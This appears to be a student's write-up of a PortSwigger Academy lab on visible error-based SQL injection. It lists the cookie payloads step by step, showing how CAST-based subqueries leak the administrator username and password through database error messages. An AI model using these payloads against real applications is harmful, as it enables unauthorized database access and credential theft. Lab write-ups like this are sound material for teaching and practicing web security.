https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based
Lab objective: Log in as the administrator user.
The database contains a different table called users, with columns called username and password.
Lab: Visible error-based SQL injection
- For this query
TrackingId=91dZKqS8SFDON8r9'we get the error massageSELECT * FROM tracking WHERE id = '91dZKqS8SFDON8r9''so we should remove the error by commenting out last'so the query willTrackingId=91dZKqS8SFDON8r9'-- - New query will
TrackingId=91dZKqS8SFDON8r9' AND CAST((SELECT 1) as int)--hereCAST()will convert type (string to number, number to string). - Number 2 query will receive this error message
ERROR: argument of AND must be type boolean, not type integer Position: 63. The meanCAST((SELECT 1) as int)this section is not boolean so we need to make the section boolean. - New query will
TrackingId=91dZKqS8SFDON8r9' AND 1=CAST((SELECT 1) as int)--and it does not give me any error. - For finding username the query is
TrackingId=91dZKqS8SFDON8r9' AND 1=CAST((SELECT username FROM users) as int)--but the error isUnterminated string literal started at position 95 in SQL SELECT * FROM tracking WHERE id = '91dZKqS8SFDON8r9' AND 1=CAST((SELECT username FROM users) as'. Expected charFrom the error we see that query end beforeint)--. We estimated there have character limitation. - So the new query will
TrackingId=' AND 1=CAST((SELECT username FROM users) as int)--we remove TrackingId and get another errorERROR: more than one row returned by a subquery used as an expression - So the new query will
TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) as int)--and we get username form errorERROR: invalid input syntax for type integer: "administrator" - And password query will
TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) as int)--and password get by errorERROR: invalid input syntax for type integer: "41r5a8xg35x3mt8iwqqi" - Login and solve the lab.